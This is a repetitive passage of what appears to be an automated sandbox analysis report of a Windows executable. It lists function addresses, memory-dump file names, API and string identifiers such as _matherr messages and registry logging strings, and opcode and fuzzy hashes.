                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-4283191376
                                                                                                                                                  • Opcode ID: 6742954880af872446bfc91b95b988c250abc5737df9b1f930ba577b45b3f3e3
                                                                                                                                                  • Instruction ID: 8b48626d4541736c6eacc897ae519eb1a074befea7067a4f15d6abe3877f7584
                                                                                                                                                  • Opcode Fuzzy Hash: 6742954880af872446bfc91b95b988c250abc5737df9b1f930ba577b45b3f3e3
                                                                                                                                                  • Instruction Fuzzy Hash: B0F01D66808F8482D2118F1CE4406ABB370FFAE789F605326FBCD66564DF2DD5528B00
                                                                                                                                                  Function 00007FF6BE03A032 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-4273532761
                                                                                                                                                  • Opcode ID: 854f2dfc0a9e7c149260f6d1f09afe283b3e576efdae8473c3133785e71ceb38
                                                                                                                                                  • Instruction ID: a530dffc0e99b9a3d2515387c90d204ac83248cf7193831f8a515e4c46fa709d
                                                                                                                                                  • Opcode Fuzzy Hash: 854f2dfc0a9e7c149260f6d1f09afe283b3e576efdae8473c3133785e71ceb38
                                                                                                                                                  • Instruction Fuzzy Hash: 5DF01D66808F8482D2118F1CE4406ABB370FFAE789F605326FBCD66564DF2DD5528B00
                                                                                                                                                  Function 00007FF6BE03A017 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-2713391170
                                                                                                                                                  • Opcode ID: efa7ca9327b7f50ec550392f9c9add8736aa4d523d0fd9fc290744eecbb183ed
                                                                                                                                                  • Instruction ID: 0597aaca5fb97fdad8c74fc0876f649a1fb6f6986b42ac38f2d32e91422960b9
                                                                                                                                                  • Opcode Fuzzy Hash: efa7ca9327b7f50ec550392f9c9add8736aa4d523d0fd9fc290744eecbb183ed
                                                                                                                                                  • Instruction Fuzzy Hash: DFF01D66808F8482D2118F1CE4406AFB370FFAE789F605326FBCD66564DF2DD5528B00
                                                                                                                                                  Function 00007FF6BE03A020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-4064033741
                                                                                                                                                  • Opcode ID: d67f6cb67d9aa1b683b19a67aea6ff021f067e3de8b3c453dfdd5ccf3ac71a10
                                                                                                                                                  • Instruction ID: 6066593df446d9ec16d251cdff0a44480760945810cc7d8dd5fe860a61aa9435
                                                                                                                                                  • Opcode Fuzzy Hash: d67f6cb67d9aa1b683b19a67aea6ff021f067e3de8b3c453dfdd5ccf3ac71a10
                                                                                                                                                  • Instruction Fuzzy Hash: A4F01D66808F8482D2118F1CE4406ABB370FFAE789F605326FBCD66564DF2DD5568B00
                                                                                                                                                  Function 00007FF6BE03A03B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-2187435201
                                                                                                                                                  • Opcode ID: 29f5a33fe2bfd9c73ec78c153296316038a8ef3e282bb18084eb0fbbc30a309e
                                                                                                                                                  • Instruction ID: daf526e61c33b34a8a82dc5335a68ad8ace4888e320d63a8e2da0d1b7c3e168c
                                                                                                                                                  • Opcode Fuzzy Hash: 29f5a33fe2bfd9c73ec78c153296316038a8ef3e282bb18084eb0fbbc30a309e
                                                                                                                                                  • Instruction Fuzzy Hash: 09F01D66808F8482D2118F1CE4406ABB370FFAE789F605326FBCD66564DF3DD5528B00
                                                                                                                                                  Function 00007FF6BE03A044 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-2468659920
                                                                                                                                                  • Opcode ID: 7b5741c81ed116a003f85b52f29fe4854fc43aa525cf99e73fbc959c4dfbf3ab
                                                                                                                                                  • Instruction ID: 089504831369cae6c97437d9ead776d40d84793df9511f7857693afacf168478
                                                                                                                                                  • Opcode Fuzzy Hash: 7b5741c81ed116a003f85b52f29fe4854fc43aa525cf99e73fbc959c4dfbf3ab
                                                                                                                                                  • Instruction Fuzzy Hash: 1BF0CD66808F8486D2118F1CE4406ABB371FFAE789F605326FBC966664DF29D5568B00
                                                                                                                                                  Function 00007FF6BE03600F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                                                  • Opcode ID: 9d775fda3a458ba423f2584b4f03a94665879259268b20caf8ffe01fa55e4727
                                                                                                                                                  • Instruction ID: a147caebf27c5cc84515a3a275434ceebd35b7d7fd63e3ece370a6448063c2c1
                                                                                                                                                  • Opcode Fuzzy Hash: 9d775fda3a458ba423f2584b4f03a94665879259268b20caf8ffe01fa55e4727
                                                                                                                                                  • Instruction Fuzzy Hash: 8DE01252B1D60785E5219B49FD116792234EB74791F440136FF4EC65A0ED2CD5A9D304
                                                                                                                                                  Function 00007FF6BE036005 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                                                  • Opcode ID: 121d7b192f278ed57b8867b485dd75cd00e68040ae21fcedfb5617aa17ed5c6e
                                                                                                                                                  • Instruction ID: 00891f70b37afdee7312dc840e3ef9878f964e1b2a15ef75eee97a82795950b1
                                                                                                                                                  • Opcode Fuzzy Hash: 121d7b192f278ed57b8867b485dd75cd00e68040ae21fcedfb5617aa17ed5c6e
                                                                                                                                                  • Instruction Fuzzy Hash: 6DE09212B1C60785E5209B08F9115792230EB74781F400136FF0EC26A0ED2CD5A5D300
                                                                                                                                                  Function 00007FF6BE036096 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                                                  • Opcode ID: e0ccdcdfff5306e8d1edb665a48736185a9a8bfcf0cc9128e54fb974368f81d1
                                                                                                                                                  • Instruction ID: 3c09d3bf51fed1be712cf0509245952065fb927642b733ff13503d6a03cc3d76
                                                                                                                                                  • Opcode Fuzzy Hash: e0ccdcdfff5306e8d1edb665a48736185a9a8bfcf0cc9128e54fb974368f81d1
                                                                                                                                                  • Instruction Fuzzy Hash: A2E09212B1C60785E5219B08FD115792234EB74780F400137FF0EC26A0ED2CD6A5D301
                                                                                                                                                  Function 00007FF6BE0360A4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                                                  • Opcode ID: 2ec1f107dc612dbc23df36b15b27c5509c6c2f0980d22f21ba96d8f5fe7989fd
                                                                                                                                                  • Instruction ID: 75cc5b76d21aeb817e44d932fac509d90980534e7b17ef90b4aa798640991213
                                                                                                                                                  • Opcode Fuzzy Hash: 2ec1f107dc612dbc23df36b15b27c5509c6c2f0980d22f21ba96d8f5fe7989fd
                                                                                                                                                  • Instruction Fuzzy Hash: DCE09212B1C60786E5209B48F9015792230EB74780F400137FF0EC26A0ED2CD5A5D300
                                                                                                                                                  Function 00007FF6BE0360E6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                                                  • API String ID: 1001908780-3542721600
                                                                                                                                                  • Opcode ID: c1dca2f90759a8d06f958ba9bdf689a9e618fea2f20c7b751fd119738c401fe0
                                                                                                                                                  • Instruction ID: 4ebb49abc1e362c5bc3055ac6475bb88f57777f08b2b58167497b06e706b191c
                                                                                                                                                  • Opcode Fuzzy Hash: c1dca2f90759a8d06f958ba9bdf689a9e618fea2f20c7b751fd119738c401fe0
                                                                                                                                                  • Instruction Fuzzy Hash: A4E09212B1C60785E6209F08F9015782230EB74780F400136FF4EC25A0ED2CD5E9D300
                                                                                                                                                  Function 00007FF6BE035C77 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                                                                                                  • API String ID: 1001908780-1337547089
                                                                                                                                                  • Opcode ID: 4c07518f48b1fb61380f18248e14e74fa3f7865503b242d04b4d615c7099220d
                                                                                                                                                  • Instruction ID: 17b3e31874abd255220bd04245981e7135f2ae893400e484d77c9cf8badbb140
                                                                                                                                                  • Opcode Fuzzy Hash: 4c07518f48b1fb61380f18248e14e74fa3f7865503b242d04b4d615c7099220d
                                                                                                                                                  • Instruction Fuzzy Hash: FEE04F62B1C60A85E530AB0CFD516B96234FFB4785F940136FF4EC66A1BE2CE5A5D300
                                                                                                                                                  Function 00007FF6BE035C81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                                                                                                  • API String ID: 1001908780-1337547089
                                                                                                                                                  • Opcode ID: 9164b3d6bb9a9877d5514284605c3413762569b8967e0ab0f7f4a42b47ca251c
                                                                                                                                                  • Instruction ID: 83c7062cd21a7bd806952e317b2ffa2d96fb567fef990dd97cbb985da483eb06
                                                                                                                                                  • Opcode Fuzzy Hash: 9164b3d6bb9a9877d5514284605c3413762569b8967e0ab0f7f4a42b47ca251c
                                                                                                                                                  • Instruction Fuzzy Hash: 3CE04F62B1C60A85E530AB0CFD517B96234FFB4785F940136FF4DC66A1AE2CE5A9D300
                                                                                                                                                  Function 00007FF6BE035D08 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                                                                                                  • API String ID: 1001908780-1337547089
                                                                                                                                                  • Opcode ID: ec246d87bd0e49d55516e5720ef49a5c671df09a73ae3c3485b49518a91bded4
                                                                                                                                                  • Instruction ID: 645d1b0e0d2796884ce4c3562056ca1e821687bc9143368816584090b3a1e92e
                                                                                                                                                  • Opcode Fuzzy Hash: ec246d87bd0e49d55516e5720ef49a5c671df09a73ae3c3485b49518a91bded4
                                                                                                                                                  • Instruction Fuzzy Hash: D8E04851B1C60A45E531AB0CFD516B96234FF74785F540137FF4DC6661AD2CD5A5D300
                                                                                                                                                  Function 00007FF6BE035D16 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
                                                                                                                                                  • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                                                                                                  • API String ID: 1001908780-1337547089
                                                                                                                                                  • Opcode ID: dc6b50ce2298b158b26909bf1de2eccee86945605b1ab18de0fe65fba1480f47
                                                                                                                                                  • Instruction ID: 66f9ed7bdf0f196a01bf18dbfb0bec35c5648c097635ae47e60c2644b644ba86
                                                                                                                                                  • Opcode Fuzzy Hash: dc6b50ce2298b158b26909bf1de2eccee86945605b1ab18de0fe65fba1480f47
                                                                                                                                                  • Instruction Fuzzy Hash: 8AE04F62B1C60A85E530AB4CFD516B96234FFB4785F940137FF4EC66A1AE2CE5A5D300
                                                                                                                                                  Function 00007FF6BE035D58 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Closefflushfwrite
